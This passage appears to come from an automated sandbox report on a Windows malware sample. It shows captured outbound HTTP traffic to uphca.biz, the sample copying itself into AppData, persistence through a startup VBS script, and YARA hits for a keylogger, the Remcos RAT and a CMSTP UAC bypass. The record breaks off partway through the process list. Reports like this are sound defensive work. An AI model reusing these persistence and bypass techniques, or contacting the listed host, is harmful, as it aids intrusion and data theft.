                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:46.436966896 CEST786OUTData Raw: 5e 26 99 12 a1 b4 2a ee 06 03 00 00 68 5f bc da b8 50 d8 33 e8 7b 3f 33 2f e6 69 85 7d 7f d5 cd 7c 07 64 17 59 23 60 d2 5c 42 64 bf 4f 8b 46 f5 ee 7b ee a2 25 8c 41 66 52 ca c8 7f 12 50 3e 60 5f 14 1a 52 b4 d3 9c 55 37 52 a1 15 6b e8 d2 7b cc 98
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ^&*h_P3{?3/i}|dY#`\BdOF{%AfRP>`_RU7Rk{4/ZOnR0UAnvkuCmh}wOGmQss>hjsMjz|R&FBYk^S6Wl%\`bkBNHO#0|zpJl$qtXS
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:47.050497055 CEST407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:46 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=2f973f326ce8057f619d672c3e8f1972|8.46.123.33|1728394186|1728394186|0|1|0; path=/; domain=.uphca.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Statistics

                                                                                                                                                                                                                                                                                                                                                                                                                              CPU Usage

                                                                                                                                                                                                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                                                                                                                                                                                                              Memory Usage

                                                                                                                                                                                                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                                                                                                                                                                                                              High Level Behavior Distribution

                                                                                                                                                                                                                                                                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                                                                                                                                                                              Behavior

                                                                                                                                                                                                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                                                                                                                                                                                                              System Behavior

                                                                                                                                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:0
                                                                                                                                                                                                                                                                                                                                                                                                                              Start time:09:27:46
                                                                                                                                                                                                                                                                                                                                                                                                                              Start date:08/10/2024
                                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Users\user\Desktop\tyRPPK48Mk.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\tyRPPK48Mk.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                                                                                              File size:3'101'805 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:94A2B51672C9FB20B8BC7EBFCBF648C0
                                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:1
                                                                                                                                                                                                                                                                                                                                                                                                                              Start time:09:27:48
                                                                                                                                                                                                                                                                                                                                                                                                                              Start date:08/10/2024
                                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\directory\name.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\tyRPPK48Mk.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                                                                                              File size:3'101'805 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:94A2B51672C9FB20B8BC7EBFCBF648C0
                                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000001.00000002.1806914004.0000000003C50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000001.00000002.1806914004.0000000003C50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000001.00000002.1806914004.0000000003C50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000001.00000002.1806914004.0000000003C50000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000001.00000002.1806914004.0000000003C50000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:2
                                                                                                                                                                                                                                                                                                                                                                                                                              Start time:09:27:50
                                                                                                                                                                                                                                                                                                                                                                                                                              Start date:08/10/2024
                                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\tyRPPK48Mk.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0xf00000
                                                                                                                                                                                                                                                                                                                                                                                                                              File size:46'504 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:3
                                                                                                                                                                                                                                                                                                                                                                                                                              Start time:09:27:50
                                                                                                                                                                                                                                                                                                                                                                                                                              Start date:08/10/2024
                                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\directory\name.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\directory\name.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                                                                                              File size:3'101'805 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:94A2B51672C9FB20B8BC7EBFCBF648C0
                                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000003.00000002.1824115002.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.1824115002.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000003.00000002.1824115002.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000003.00000002.1824115002.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000003.00000002.1824115002.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:4
                                                                                                                                                                                                                                                                                                                                                                                                                              Start time:09:27:51
                                                                                                                                                                                                                                                                                                                                                                                                                              Start date:08/10/2024
                                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\directory\name.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0xf00000
                                                                                                                                                                                                                                                                                                                                                                                                                              File size:46'504 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:5
                                                                                                                                                                                                                                                                                                                                                                                                                              Start time:09:27:52
                                                                                                                                                                                                                                                                                                                                                                                                                              Start date:08/10/2024
                                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\directory\name.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\directory\name.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                                                                                              File size:3'101'805 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:94A2B51672C9FB20B8BC7EBFCBF648C0
                                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000002.1848783066.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.1848783066.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000005.00000002.1848783066.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000005.00000002.1848783066.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000005.00000002.1848783066.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:6
                                                                                                                                                                                                                                                                                                                                                                                                                              Start time:09:27:53
                                                                                                                                                                                                                                                                                                                                                                                                                              Start date:08/10/2024
                                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\directory\name.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0xf00000
                                                                                                                                                                                                                                                                                                                                                                                                                              File size:46'504 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:7
                                                                                                                                                                                                                                                                                                                                                                                                                              Start time:09:27:55
                                                                                                                                                                                                                                                                                                                                                                                                                              Start date:08/10/2024
                                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                                                                                              File size:1'290'240 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:044E4725979E3F506813C6D46BCC5F85
                                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                                                                                                                                                                                                                                                              • Detection: 100%, Avira
                                                                                                                                                                                                                                                                                                                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:8
                                                                                                                                                                                                                                                                                                                                                                                                                              Start time:09:27:55
                                                                                                                                                                                                                                                                                                                                                                                                                              Start date:08/10/2024
                                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                                                                                              File size:1'225'728 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:6D599A0860A654A2D629A56D388C66FA
                                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:9
                                                                                                                                                                                                                                                                                                                                                                                                                              Start time:09:27:56
                                                                                                                                                                                                                                                                                                                                                                                                                              Start date:08/10/2024
                                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\drivers\AppVStrm.sys
                                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:
                                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:
                                                                                                                                                                                                                                                                                                                                                                                                                              File size:138'056 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:BDA55F89B69757320BC125FF1CB53B26
                                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:
                                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:
                                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:10
                                                                                                                                                                                                                                                                                                                                                                                                                              Start time:09:27:56
                                                                                                                                                                                                                                                                                                                                                                                                                              Start date:08/10/2024
                                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\drivers\AppvVemgr.sys
                                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:
                                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:
                                                                                                                                                                                                                                                                                                                                                                                                                              File size:174'408 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:E70EE9B57F8D771E2F4D6E6B535F6757
                                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:
                                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:
                                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:11
                                                                                                                                                                                                                                                                                                                                                                                                                              Start time:09:27:56
                                                                                                                                                                                                                                                                                                                                                                                                                              Start date:08/10/2024
                                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\drivers\AppvVfs.sys
                                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:
                                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:
                                                                                                                                                                                                                                                                                                                                                                                                                              File size:154'952 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:2CBABD729D5E746B6BD8DC1B4B4DB1E1
                                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:
                                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:
                                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:12
                                                                                                                                                                                                                                                                                                                                                                                                                              Start time:09:27:56
                                                                                                                                                                                                                                                                                                                                                                                                                              Start date:08/10/2024
                                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\AppVClient.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\AppVClient.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                                                                                              File size:1'348'608 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:CE73AC0BEBC9815C9D34668A399D261C
                                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:15
                                                                                                                                                                                                                                                                                                                                                                                                                              Start time:09:27:58
                                                                                                                                                                                                                                                                                                                                                                                                                              Start date:08/10/2024
                                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\FXSSVC.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\fxssvc.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                                                                                              File size:1'242'624 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:82E1FBAFE5AE9628723F49D8C572AFBC
                                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:16
                                                                                                                                                                                                                                                                                                                                                                                                                              Start time:09:28:00
                                                                                                                                                                                                                                                                                                                                                                                                                              Start date:08/10/2024
                                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\wscript.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"
                                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0x7ff703870000
                                                                                                                                                                                                                                                                                                                                                                                                                              File size:170'496 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:17
                                                                                                                                                                                                                                                                                                                                                                                                                              Start time:09:28:01
                                                                                                                                                                                                                                                                                                                                                                                                                              Start date:08/10/2024
                                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                                                                                              File size:2'354'176 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:65611321C594D4EC8606881B5B2236C0
                                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:18
                                                                                                                                                                                                                                                                                                                                                                                                                              Start time:09:28:01
                                                                                                                                                                                                                                                                                                                                                                                                                              Start date:08/10/2024
                                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\directory\name.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\directory\name.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                                                                                              File size:3'101'805 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:94A2B51672C9FB20B8BC7EBFCBF648C0
                                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000012.00000002.1962839216.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000012.00000002.1962839216.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000012.00000002.1962839216.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000012.00000002.1962839216.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000012.00000002.1962839216.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:19
                                                                                                                                                                                                                                                                                                                                                                                                                              Start time:09:28:02
                                                                                                                                                                                                                                                                                                                                                                                                                              Start date:08/10/2024
                                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                                                                                              File size:1'356'800 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:D4047A35D44FF5A878217467E0BC115E
                                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:21
                                                                                                                                                                                                                                                                                                                                                                                                                              Start time:09:28:03
                                                                                                                                                                                                                                                                                                                                                                                                                              Start date:08/10/2024
